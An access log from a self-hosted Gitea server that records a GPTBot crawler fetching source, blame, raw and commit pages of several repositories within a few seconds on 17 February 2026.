+[17/Feb/2026:15:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py?display=source" [Client 74.7.227.38] [Length 12972] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py" +[17/Feb/2026:15:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10841] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py" +[17/Feb/2026:15:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf?display=source" [Client 74.7.227.38] [Length 11926] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf" +[17/Feb/2026:15:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py?display=source" [Client 74.7.227.38] [Length 16099] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py" +[17/Feb/2026:15:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf?display=rendered" [Client 74.7.227.38] [Length 10844] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf" +[17/Feb/2026:15:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13261] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:15:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 11134] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx" +[17/Feb/2026:15:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal" [Client 74.7.227.38] [Length 50614] [Gzip 9.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal" +[17/Feb/2026:15:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json?display=source" [Client 74.7.227.38] [Length 11684] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json" +[17/Feb/2026:15:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md?display=source" [Client 74.7.227.38] [Length 15795] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" +[17/Feb/2026:15:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" +[17/Feb/2026:15:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx" +[17/Feb/2026:15:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx" +[17/Feb/2026:15:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh?display=source" [Client 74.7.227.38] [Length 14928] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh" +[17/Feb/2026:15:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh?display=source" [Client 74.7.227.38] [Length 14933] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh" +[17/Feb/2026:15:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument" [Client 74.7.227.38] [Length 60416] [Gzip 9.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" +[17/Feb/2026:15:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11906] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts" +[17/Feb/2026:15:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10418] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm" +[17/Feb/2026:15:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh" +[17/Feb/2026:15:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh?display=rendered" [Client 74.7.227.38] [Length 10935] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh" +[17/Feb/2026:15:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fAnalysis-00.toc" [Client 74.7.227.38] [Length 26859] [Gzip 7.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:15:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fAnalysis-00.toc" [Client 74.7.227.38] [Length 17162] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:15:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=PythonTest%2fGitea_Manual.md" [Client 74.7.227.38] [Length 37155] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md" +[17/Feb/2026:15:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=PythonTest%2fmain.py" [Client 74.7.227.38] [Length 35235] [Gzip 7.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" +[17/Feb/2026:15:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 11567] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 11065] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 11529] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 11066] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 27435] [Gzip 7.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js" +[17/Feb/2026:15:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 11554] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 11540] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 12163] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 2221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:15:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 11527] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 10430] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:15:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:15:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 10421] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:15:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9991] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:15:30:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:15:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 10191] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 37081] [Gzip 12.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:15:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv?display=source" [Client 74.7.227.38] [Length 11557] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:15:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 10420] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:15:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 9946] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:15:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 11444] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:15:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:15:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 248] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:15:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:15:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 